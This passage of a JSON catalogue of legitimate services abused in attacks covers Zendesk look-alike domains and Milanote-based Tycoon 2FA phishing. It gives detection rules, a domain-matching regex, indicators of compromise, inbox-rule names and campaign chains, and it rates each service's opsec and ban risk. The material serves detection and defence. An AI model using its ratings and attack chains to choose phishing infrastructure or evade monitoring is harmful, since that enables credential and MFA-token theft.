      "HIGH PRIORITY: alert on user web traffic or email links pointing to domains matching [brandname]zendesk[.]com that are NOT *.zendesk.com - ShinyHunters March 2026 phishing campaign uses this pattern with valid TLS certs to impersonate brands' support portals (60+ domains identified by ReliaQuest)",
      "DNS: monitor for newly registered domains containing 'zendesk' that are NOT *.zendesk.com subdomains - these are impersonation domains targeting credential harvesting",
      "DNS: typosquatted Zendesk domains (e.g. znedesk.com, vpn-zendesk.com) - 40+ registered Nov 2025 + 60+ registered Jan-March 2026 via NiceNic/Cloudflare by ShinyHunters",
      "EMAIL: ticket confirmation emails from Zendesk instances your org does not use - these originate from the customer's domain, not zendesk.com",
      "EMAIL: high volume of ticket creation notifications from multiple brands' Zendesk instances targeting same recipient (email bomb indicator)",
      "SSO: fake Zendesk SSO portal on non-zendesk.com domain requesting credentials - ShinyHunters embeds trusted brand names into malicious domains for legitimacy",
      "TICKET CONTENT: attachments containing .exe, .hta, .lnk, .ps1 or RMM installers (FleetDeck, Atera, ScreenConnect) submitted via Zendesk tickets",
      "TICKET CONTENT: urgent password reset or IT support pretexts targeting help desk staff - common Scattered Spider/Lapsus$/ShinyHunters social engineering",
      "BEHAVIORAL: support agent account accessing tickets from unusual IP/geo (compromised agent credential indicator)",
      "BEHAVIORAL: bulk API queries via compromised agent tokens (data exfiltration pattern, as seen in Discord Zendesk breach)",
      "SIEM RULE: alert on Zendesk API traffic to tenants NOT in your approved tenant allowlist - high confidence indicator of phishing or data exfil",
      "SIEM RULE: regex match on proxy/DNS logs for domains matching .*zendesk\\.(com|net|org|io) that are NOT zendesk.com or *.zendesk.com - impersonation domain indicator"
    ],
    "notes": "Customer service platform serving 100k+ companies. Scattered Lapsus$ Hunters (Scattered Spider + ShinyHunters + Lapsus$ coalition) registered 40+ typosquatted Zendesk domains with fake SSO portals for credential harvesting, using NiceNic registrar + Cloudflare-masked nameservers (ReliaQuest Nov 2025). March 2026 update: ShinyHunters firing up another campaign - ReliaQuest identified 60+ newly registered domains following [brandname]zendesk[.]com pattern targeting financial services, SaaS vendors, and high-value sectors. Domains use valid TLS certificates to appear authentic in browsers and email clients. Fraudulent tickets submitted to legitimate Zendesk portals to infect help-desk staff with RATs via pretexts like urgent password resets (ReliaQuest). Discord breach (Sept 2025): attackers compromised a BPO support agent account with access to Discord's Zendesk instance, stealing 1.6TB of data including usernames, emails, billing info, IPs, and ~70k government IDs. Zendesk clarified its own platform was not compromised - the attack exploited a compromised agent credential (BleepingComputer Oct 2025). WithSecure (July 2025): attackers exploit Zendesk trusted ticket infrastructure to distribute signed RMM tools (FleetDeck, Atera, ScreenConnect), bypassing security controls in European phishing campaigns. Email bomb attack (Jan 2026): anonymous ticket creation abused for mass spam via legitimate Zendesk instances of Discord, Tinder, Dropbox, NordVPN, Riot Games, Kahoot, Headspace. Brian Krebs targeted. Emails bypass spam filters because they originate from legitimate company infrastructure"
  },
  {
    "name": "Milanote",
    "url": "https://milanote.com",
    "category": "Phishing",
    "provider": "Milanote Pty Ltd",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "milanote.com",
      "*.milanote.com",
      "app.milanote.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 1,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Emails sent from legitimate support@milanote.com pass SPF, DKIM, DMARC. Niche creative tool - most orgs don't use it, making allowlist-based detection highly effective. Any Milanote traffic in a non-Milanote org is a strong anomaly signal. Post-compromise: attackers create inbox rules to hide evidence. Free tier with no time limit",
    "socDetection": "moderate",
    "banRisk": "low",
    "banNotes": "Milanote is a niche creative collaboration tool - most SOC teams don't monitor or block it. Low enforcement visibility",
    "verification": "Email verification",
    "trust": "medium",
    "lastVerified": "2026-03",
    "customDomain": false,
    "customDomainNotes": "N/A",
    "dataRetention": "Permanent (free: 100 notes/images/links, 10 file uploads). Unlimited shared boards",
    "rateLimits": "No API. No explicit rate limits on web interface",
    "maxFileSize": "10 file uploads on free plan. Size limits not publicly documented",
    "logging": "No audit logs. No admin dashboard on free tier",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free forever: 100 notes/images/links, 10 file uploads, unlimited shared boards. Pro: $9.99/mo (annual) for unlimited everything"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "Google/Apple sign-in via OAuth. No enterprise SSO. No MFA"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1550.004",
      "T1114.003",
      "T1564.008"
    ],
    "refs": [
      {
        "title": "Milanote Plans",
        "url": "https://milanote.com/plans"
      },
      {
        "title": "Darktrace: MFA Under Attack - AiTM Phishing Kits Abusing Milanote and Tycoon 2FA",
        "url": "https://www.darktrace.com/blog/mfa-under-attack-aitm-phishing-kits-abusing-legitimate-services"
      },
      {
        "title": "CyberSecurityNews: AiTM Phishing Kits Bypassing MFA via Milanote + Tycoon 2FA",
        "url": "https://cybersecuritynews.com/aitm-phishing-kits-bypassing-mfa/"
      },
      {
        "title": "CyberPress: AiTM Phishing Kits Defeat MFA by Stealing Credentials and Tokens",
        "url": "https://cyberpress.org/aitm-phishing-kits-defeat-mfa-by-stealing-credentials/"
      },
      {
        "title": "ANY.RUN: Tycoon 2FA Malware Analysis (Milanote as phishing vector)",
        "url": "https://any.run/malware-trends/tycoon/"
      },
      {
        "title": "CYFIRMA: Tycoon 2FA Technical Analysis of AiTM Phishing Operation",
        "url": "https://www.cyfirma.com/research/tycoon-2fa-a-technical-analysis-of-its-adversary-in-the-middle-phishing-operation/"
      },
      {
        "title": "Centripetal: Tycoon 2FA vs Sneaky 2FA - Two PhaaS Campaigns Targeting MFA Bypass",
        "url": "https://www.centripetal.ai/threat-research/typhoon-versus-sneaky"
      },
      {
        "title": "UnderCode News: How Hackers Defeat MFA with AiTM Using Milanote and Tycoon 2FA",
        "url": "https://undercodenews.com/phishing-20-how-hackers-are-defeating-mfa-with-aitm-attacks-using-milanote-and-tycoon-2fa/"
      }
    ],
    "detection": [
      "DOMAIN: milanote.com, *.milanote.com, app.milanote.com",
      "EMAIL: messages from support@milanote.com referencing 'new agreement', 'shared board', or 'invitation' - legitimate Milanote sender abused as phishing vector",
      "ALLOWLIST LOGIC: if your org does not use Milanote, block or alert on ALL traffic to milanote.com - this is a niche creative tool, most enterprises don't use it",
      "ALLOWLIST LOGIC: if your org uses Milanote, alert on board share notifications sent to users who are not in the Milanote-authorized group",
      "INBOX RULE: Exchange/M365 inbox rules named 'GTH' or 'GFH' that delete emails containing 'milanote' in subject or body - post-compromise persistence by Tycoon 2FA",
      "REDIRECT CHAIN: Milanote link -> Cloudflare Turnstile CAPTCHA -> fake Microsoft/Google login page (AitM credential + MFA token harvesting)",
      "BEHAVIORAL: user clicks Milanote link then immediately authenticates from a new/unusual IP or geolocation - session hijack indicator via stolen session cookie",
      "BEHAVIORAL: simultaneous active sessions from two geographically distant locations after Milanote email interaction (impossible travel)",
      "TYCOON 2FA IOCs: DNS queries to lrn.ialeahed.com and similar Tycoon infrastructure domains",
      "TYCOON 2FA IOCs: phishing pages with disabled right-click, blocked copy/paste, and anti-debugging scripts",
      "M365 CONDITIONAL ACCESS: MFA-validated logins from IP ranges associated with known AitM proxy infrastructure - cross-reference with bad ASN list: github.com/mthcht/awesome-lists/blob/main/Lists/ASNs/_ALL_BAD_ASN_IP_Ranges_List.csv",
      "SIEM RULE: any email from milanote.com domains in environments that don't use Milanote should be treated as suspicious - high confidence phishing indicator"
    ],
    "notes": "Visual collaboration/note-taking platform. Primary phishing vector for Tycoon 2FA Adversary-in-the-Middle phishing kit (PhaaS, $120/10 days via Telegram). Darktrace SOC investigated multiple compromises in late 2024/early 2025 where Milanote emails were used as initial vector. Attack chain: phishing email from support@milanote.com referencing 'new agreement' -> Milanote board with mix of legitimate and malicious links -> Cloudflare Turnstile CAPTCHA -> fake Microsoft/Google login page -> AitM intercepts credentials + MFA tokens + session cookies in real-time. Post-compromise: attackers create inbox rule 'GTH' to delete emails containing 'milanote', access 140+ emails, modify sent items attachments for BEC invoice fraud. Campaign targeted 19 users in one org - one compromised within minutes despite MFA. Used alongside Mamba 2FA kit. Tycoon 2FA linked to 3000+ phishing pages, 1200+ domains, active since Aug 2023. Campaign variants in multiple languages with anti-analysis features (disabled right-click, blocked content copying)"
  }
]